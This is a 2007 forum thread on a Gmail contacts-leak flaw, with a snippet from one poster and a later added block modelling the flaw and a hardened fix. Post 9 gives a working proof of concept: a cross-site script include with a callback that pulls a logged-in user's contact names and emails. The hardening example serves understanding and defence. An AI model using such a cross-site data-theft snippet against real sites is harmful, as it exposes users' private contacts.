
Gmail leaves your account open to spammers

Discussion in 'News' started by Jimmy 2004, Jan 1, 2007.

  1. Jimmy 2004

    A new flaw has been exposed in Google’s Gmail service which could allow hackers to get hold of your contacts. When you log into your Gmail (Googlemail in some countries) account, Google will put your details into a JavaScript file. Because of this, if you browse other websites whilst logged into your account, any of them could potentially declare the function “google” and be able to get hold of all of your contacts. The only two ways to ensure your privacy is safe are to disable JavaScript in all websites except those you trust or to not browse other sites whilst logged into any Google service. Admittedly Gmail is still only a beta, but a fault like this could be quite serious.

    Update: Disabling JavaScript did not solve this problem, however it appears that Google has now fixed this issue and your contacts list should be safe.

    Source: Engadget
     
    Last edited: Jan 1, 2007
  2. spectre440 New Member

    Hopefully Google will do the right thing and plug that hole in their users' security.
     
  3. peach1971

    Just use Firefox + Add-on NoScript.

    Turn on Java to read your mails?
    Lol, how far have we gone... :D

    And here is another useful thing:
    http://www.customizegoogle.com/

    No more annoying ads! :D
     
  4. cdawall where the hell are my stars

    wondered how my account got spammed
     
  5. Atech New Member

    This vulnerability has nothing to do with Java.
     
  6. pt

    No spam for me :)
    (I don't have Java installed)
     
  7. peach1971

    Nothing to do with Java?

    Sorry, I don't get it, Atech.
     
  8. Jimmy 2004

    Well, from what I read when posting this story it was a JS (JavaScript) file that causes this problem, and you disable Java to protect yourself so it must link to Java :confused:
     
  9. Atech New Member

    Code:
    <script language="javascript">
    // Callback named in the request below; the returned script calls it with the contact data.
    function getContacts(response){
        var output = "";
        for(var x=0;x<response.Body.Contacts.length;x++){
            output += response.Body.Contacts[x].Name + " <" + response.Body.Contacts[x].Email + "> ";
        }
        alert(output);
    }
    </script>
    
    <script language="javascript" src="http://video.google.com/data/contacts?out=js&max=500&psort=Affinity&callback=getContacts">
    </script>
    
    No calls to the Java API there.

    Edit: Gah to having to escape characters within code tags ...
     
    Last edited: Jan 1, 2007
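The pattern in the snippet above, modelled in-process as an added example (not part of the thread and not Google's code): a cookie-authenticated endpoint that wraps private data in a caller-named function, beside one common hardening. The session store, token, header name and all function names are hypothetical, and the thread does not say how Google actually fixed the endpoint.

```javascript
// Constructed session store; every name in this block is hypothetical.
const SESSIONS = {
  "sid-alice": { token: "tok-4f9a", contacts: [{ Name: "Bob", Email: "bob@example.test" }] },
};

// Pattern from the thread: cookie-authenticated data wrapped in a caller-named function.
function vulnerableHandler(req) {
  const session = SESSIONS[req.cookies.sid];
  const payload = session
    ? { Success: true, Body: { Contacts: session.contacts } }
    : { Success: false, Errors: [] };
  const callback = req.query.callback || "google";
  return { status: 200, type: "text/javascript", body: `${callback}(${JSON.stringify(payload)})` };
}

// One common hardening (an assumption, not necessarily what Google deployed).
function hardenedHandler(req) {
  const session = SESSIONS[req.cookies.sid];
  const deny = (status) => ({ status, type: "application/json", body: '{"Success":false,"Errors":[]}' });
  if (!session) return deny(401);
  // Private data is never emitted in script form, so any callback request is refused.
  if (req.query.callback !== undefined) return deny(400);
  // A <script> include cannot set request headers, so the token shows same-site code asked.
  if (req.headers["x-csrf-token"] !== session.token) return deny(403);
  return {
    status: 200,
    type: "application/json",
    headers: { "X-Content-Type-Options": "nosniff" },
    body: JSON.stringify({ Success: true, Body: { Contacts: session.contacts } }),
  };
}

// Models another site's <script src=...> include: the browser attaches the cookie,
// the foreign page supplies the callback, and only script-typed 200 responses execute.
function crossSiteInclude(handler) {
  const seen = [];
  const res = handler({ cookies: { sid: "sid-alice" }, query: { callback: "getContacts" }, headers: {} });
  if (res.status === 200 && res.type === "text/javascript") {
    const getContacts = (r) => r.Success && r.Body.Contacts.forEach((c) => seen.push(c.Email));
    new Function("getContacts", res.body)(getContacts);
  }
  return seen;
}

// The site's own client: same cookie, no callback, token sent in a header.
function sameSiteFetch(handler) {
  return handler({ cookies: { sid: "sid-alice" }, query: {}, headers: { "x-csrf-token": "tok-4f9a" } });
}
```

`crossSiteInclude(vulnerableHandler)` returns the contact's address, while the same include against `hardenedHandler` returns nothing and `sameSiteFetch(hardenedHandler)` still gets the list as plain JSON.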
  10. Jimmy 2004


    Whatever the case is, log into your Gmail and click here to see a nice list of your contacts. I'm not sure how a hacker can get hold of this, but I expect it's true. The reason that it may no longer be using Java is because Google claim to have fixed the issue. I'm not an expert on Java, I'm just informing people of what I find.

    Edit: well I disabled JavaScript and that page still shows my contacts... but Gmail doesn't work. Probably need to clear my cookies etc.

    Edit2: Disabling JavaScript does NOT seem to solve this problem, that link still shows my contacts after I have cleared all my internet data with Javascript disabled... and I can't even use the Gmail service!!!

    Edit3: Couldn't the line
    script language="javascript" src="http://video.google.com/data/contacts?out=js&max=500&psort=Affinity&callback=getContacts"
    be linked to this?
     
    Last edited: Jan 1, 2007
  11. WarEagleAU

    Good thing I don't use Gmail, too hard to get one anywho.
     
  12. mout12

    No. Go to mail.google.com, click 'SIGN UP', then enter your mobile phone number, and they'll send you a password via text message to your phone number. You'll have an account.
     
  13. Namslas90 New Member

    Just proves that you can't rely on anyone to secure your PC, but yourself!
     
  14. cdawall where the hell are my stars

    What's your email? I have some signups left.
     
  15. pt

    I have 99, anyone want one :)?
     
  16. Bull Dog

    That link doesn't work for me.....meaning that when I am logged into my Gmail acct, and when I click on the link all I get is this:
    google ({
    Success: false,
    Errors: []
    })

    Using FireFox.
     
  17. Jimmy 2004

    Me too, I think they must've fixed it. I've updated the newspost again.

    When I clicked that link earlier it would bring up a list in which you could find any info about your contacts you had saved.
     
